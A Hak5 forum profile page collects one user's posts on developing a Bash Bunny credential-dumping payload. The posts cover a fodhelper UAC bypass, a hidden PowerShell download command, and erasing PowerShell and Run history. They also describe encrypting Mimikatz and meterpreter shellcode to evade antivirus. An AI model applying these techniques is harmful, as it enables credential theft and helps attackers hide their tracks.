Jump to content
Hak5 Forums


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


About qdba

  • Rank
    Hak5 Fan ++

Profile Information

  • Gender
  • Location
  • Interests
    IT-Security, Linux, Programming Languages
  1. New Version added You can set UAC_MODE=0 in payload.txt
  2. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    Add multiple UAC Modes set variable UAC_MODE in payload.txt UAC_MODE=1 # Fodhelper UAC UAC_MODE=0 # Standard UAC Mode Just Beta ( Works on my Windows 10 - Not tested on 7 yet)
  3. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    OK.... Some new changes (Beta State) Better Cleanup - remove all changes in Powershell History - remove all changes in Run MRU (not only delete te files) https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
  4. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    I must check, if the command for switching of the history is still in the history file after execution. Can't do it now. Have no powershell here. The result give me the route foe the rest.
  5. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    It cannot be done in the line with the main.ps1 call because...... ....... A 1 first Powershell task will be started fo the input of the registry command for UAC Baypass. Than the fodhelper opens a second Powershell task in Admin mode. The first Powershell task can be closed after the fodhelper thing The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" in the second PS Task. A third PS Task ist opening, waiting for HTTP Server is coming up and downloads the main.ps1. The second task is closed with the "exit" at the end of the main.ps1 line. If you remove the history between the main.ps1 call and the exit command it's to fast. the main.ps1 is still running and create new history events. The main.ps1 is ready if the EOF File was created in the loot dir. ( payload.txt: line 95 ) The computer can be cleand after this event. so... 1. The history must switched of at the very first beginning befor the Regiytry Command of UAC Bypass. Considerations: does the Set-PSReadlineOption –HistorySaveStyle SaveNothing comman switch of the history global ? If so ... good... if not set a Marker in History file 2. Do all the stuff..... 3. Problem.... Switch history on after the EOF will be written. Maybe can be done with switch ATTACKMODE to HID and do all the things in a GUI (r ?) or start a dos comandline at the end of main.ps1 wo do all the cleanup (Switch on commandline kill powershell, copy back a saved history file, delete all lines from marker to end or.... / and... other things. Will sleep after that..
  6. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    Got it ... With Set-PSReadlineOption –HistorySaveStyle SaveNothing the History saving in Powershell will be switched off. So I set it at the beginning of the Script and delete the History File at the end
  7. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the powershell history.
  8. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    Code for clearing "Run" history was already in main.ps1 ......... # Epmty Run Input Field Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentContinue ........ Added the code to clear Powwershell history to main.ps1 We should avoid too much "Q GUI r" commands. because it's visible.
  9. Which Version of DumpCreds do you use? The newest ist 2.3. You can download it here https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
  10. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    Updated the repo so hak5 could merge it to the master branch Changed Version to 2.3 Add taskill /F /IM powershell.exe at the end of main.ps1
  11. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    I merged your path to the master branch. Did some patches so fodhelper starts hidden. https://github.com/qdba/bashbunny-payloads/blob/master/payloads/library/credentials/DumpCreds/payload.txt
  12. [PAYLOAD] New DumpCreds 2.3.2 [09/25/2017]

    @PoSHMagiC0de Thank you for your opinion and suggestion. I give you 100% , writing scripts in Function format is not so bad. But... ... When I start writing DumpCreds and other scripts for BB I didn't do anything before with powershell. Not even a "Hello World" . So I'm fighting a lot with the powershell syntax and some effects I did not expect. - output Lines are truncated - piping directly to a file on BB's smbserver.py did not work - when I piping the output to variables CRs and LFs are vanished - No idea how to start functions in Background I'm CIO and CSIO at 3 different companies with round about 350 Workstation 30 Servers 120 Printers. My team ( 2 other guys) and I do everything you can imagine in the IT. From installing and configurating firewalls, switches and routers, SAN, NAS, over 1st, 2nd, 3rd Level Support for the employees in Office and Windows, communication , managing and configure the 30 postfix, exchange, Samba, HTTP, Secmail File ,..... Servers, supporting and customizing SAP (MM, PP, Base, WM, user rights management, ) ,writing Reports and Scripts in ABAP, Perl, Bash, DOS, VB, VBA, QlickView, and so on..... 3 persons for the whole IT stuff with less help from outside. I need DumpCreds and a Excel Doc with encrypted meterpreter shellcode for a live hacking demo during the training to raise the awareness of our employees in IT Security. I will sensitize them. As I did it, it was the fastest and most effective way for me to learn powershell and program that script. At the moment I have no time to take care about a well written script. Maybe I will do it in version 3.0 . (And I will remove my modifications from the used Empire scripts in 3.0). I did the encryption thing because everytime a plugged in BB in arming or storage mode for developing or trying another payload my AV deletes Empires Mimikatz.ps1 script. A simple obfuscation didn't help a lot. First I wanted to do it with base64 encoding and compression. But during my work with the excel doc the base64 encoded meterpreter shellcode was detected by my AV Scanners. I think one day AV Scanneres will detect the encoded mimikatz Script. Especially I pulish the script in the forum. If so its very easy to hide the script once more. Only changing the password and/or salt. Encode it new with https://github.com/qdba/MyBashBunny/tree/master/Other/EncDecFiles and thats it. Thats the idea behind all...